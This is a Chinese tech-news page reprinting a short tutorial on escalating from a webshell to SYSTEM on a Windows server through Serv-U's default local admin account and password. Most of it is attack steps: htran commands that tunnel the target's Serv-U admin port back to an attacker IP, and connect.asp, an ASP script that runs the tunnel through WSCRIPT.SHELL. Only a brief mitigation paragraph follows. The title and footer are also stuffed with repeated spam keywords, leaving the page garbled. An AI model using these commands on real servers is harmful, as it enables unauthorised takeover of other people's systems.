Behind Collegebabevideo Ru Loc Php Url %2F%2Fpindosamdor Item Php Id 177 College Babe Video Webshell与Serv-u结合获系统最高权限 — IT技术 - 赛迪网

Video College College

Behind Collegebabevideo Ru Loc Php Url %2F%2Fpindosamdor Item Php Id 177 College Babe Video Webshell与Serv-u结合获系统最高权限 — IT技术 - 赛迪网

Behind Collegebabevideo Ru Loc Php Url %2F%2Fpindosamdor Item Php Id 177 College Babe Video

假设你的IP是 202.96.209.168

1.在你自己的机器上运行 htran.exe -listen 23 56;

2.此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P;

3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23

如果不能在webshell下直接运行,可以写一个asp脚本来执行,内容如下: 

connect.asp
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>

执行connect.asp,如果出来一片空白,没提示什么错误,现在你应该可以管理目标服务器的Serv-U了,余下的事情就看您自由发挥了。htran.exe是一个多线程包转发工具,可以到红盟下载

防止方法

自己给Serv-U打补丁,改变默认端口及管理密码。修改 ServUAdmin.exe、ServUDaemon.exe这两个文件,改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可

很遗憾,在Serv-U的最新版本Serv-U 5.2.0.0中依然没有任何改变,默认的管理端口及密码还是原来的。(t005)


[  ] 字体[  ] [ 打印 ] [  ] [ 推荐给朋友 ]
  相关文章
· 安全人员怀疑Vista安全性 (04-08) · 高手详解 木马和病毒清除的通用解法 (04-06)
· 深挖Vista安全特性 谁在保证数据安全 (04-06) · 新病毒时代我们如何才能安全保护自己 (04-05)
· 病毒预报 木马猖獗用户小心恶意后门 (04-05) · ARP欺骗木马程序入侵电脑系统破坏严重 (04-05)
· 金睛火眼—从进程中判断出病毒和木马 (04-05) · 稳打稳扎驱逐Windows系统“流氓”文件 (04-05)
· 电子支付平台的WEB登陆安全性简要分析 (04-05) · 服务器安全 妙招儿防范拒绝服务攻击 (04-05)
  客户需求反馈表
* 姓  名:
更多资料  了解方案  认识厂商
* 单位名称:
* 联系电话:
* 电子邮件:
xBehind Collegebabevideo Ru Loc Php Url %2F%2Fpindosamdor Item Php Id 177 College Babe Video Webshell与Serv-u结合获系统最高权限 — IT技术 - 赛迪网i College College Babe CollegebBehind Collegebabevideo Ru Loc Php Url %2F%2Fpindosamdor Item Php Id 177 College Babe Video Webshell与Serv-u结合获系统最高权限 — IT技术 - 赛迪网i n College
资讯 通信 IT产品 IT技术 信息化